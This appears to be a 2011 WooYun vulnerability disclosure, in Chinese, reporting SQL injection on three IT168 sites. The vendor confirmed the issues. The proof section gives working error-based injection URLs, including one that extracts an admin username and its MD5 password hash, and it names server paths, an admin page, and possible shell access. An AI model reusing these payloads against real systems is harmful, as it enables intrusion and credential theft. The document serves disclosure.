漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03550
漏洞标题:IT168几个SQL注射漏洞
相关厂商:IT168.com
漏洞作者: Jannock
提交时间:2011-12-06 13:38
修复时间:2012-01-05 13:39
公开时间:2012-01-05 13:39
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-12-06: 细节已通知厂商并且等待厂商处理中
2011-12-07: 厂商已经确认,细节仅向厂商公开
2011-12-17: 细节向核心白帽子及相关领域专家公开
2011-12-27: 细节向普通白帽子公开
2012-01-06: 细节向实习白帽子公开
2012-01-05: 细节向公众公开
简要描述:
IT168几个SQL注射漏洞
详细说明:
1、http://adshow.it168.com/admin2006/
用户名的地方存在SQL注入
2、http://answer.it168.com/answer_my.php?tid=63696
tid 存在注入
3、http://v.it168.com/comment/comment.php?action=vote&field=
field 存在注入
漏洞证明:
1、请求http://adshow.it168.com/admin2006/chkadmin.asp?username
取得路径
E:\ADSHOW\ADMIN2006\../include/check_Sql.asp,行 17
用户名:
a' and (select @@version)>0--
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
在将 nvarchar 值 'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换成数据类型 int 时失败。
/admin2006/chkadmin.asp,行 35
知道路径,也存在注入,backup shell没测试。
2、http://answer.it168.com/answer_my.php?tid=63696%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
Error: Duplicate entry '|5.1.37-log|1' for key 'group_key'
Errno.: 1062
3、http://v.it168.com/comment/comment.php?action=vote&field=content=0x7c%20where%20commentid=1%20%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20phpcms_member%20where%20groupid=1%20limit%203,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
MySQL Error : Duplicate entry '|IT168手机|e10adc3949ba59abbe56e057f20f883e|1' for key 'group_key'
后台路径存在
http://v.it168.com/admin.php
找到超管估计可以拿shell,没进一步测试。
修复方案:
懂得
版权声明:转载请注明来源 Jannock@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2011-12-07 14:43
厂商回复:
谢谢Jannock.
最新状态:
暂无